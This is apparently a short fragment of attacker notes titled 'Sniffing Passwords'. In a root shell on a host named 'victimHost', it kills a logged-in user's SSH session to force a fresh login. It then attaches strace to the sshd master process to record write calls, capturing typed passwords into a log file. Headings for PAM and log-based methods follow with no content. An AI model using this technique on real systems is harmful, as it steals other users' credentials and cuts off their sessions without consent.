Sniffing Passwords
Strace
[root@victimHost ~]# w
15:05:18 up 26 days, 6:25, 2 users, load average: 0.00, 0.05, 0.16
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
unixadm pts/0 someHost 15:04 6.00s 0.03s 0.00s sshd: unixadm [priv]
[root@victimHost ~]# ps aux | grep ssh
root 1366 0.0 0.0 113000 4368 ? Ss Jun02 0:00 /usr/sbin/sshd -D
unixadm 28721 0.0 0.0 176412 2644 ? S 10:04 0:00 sshd: unixadm@pts/0
[root@victimHost ~]# kill 28721
[root@victimHost ~]# strace -f -p 1366 -e trace=write -o data.log
strace: Process 1366 attachedPAM
Encrypted logs
Unencrypted logs
Last updated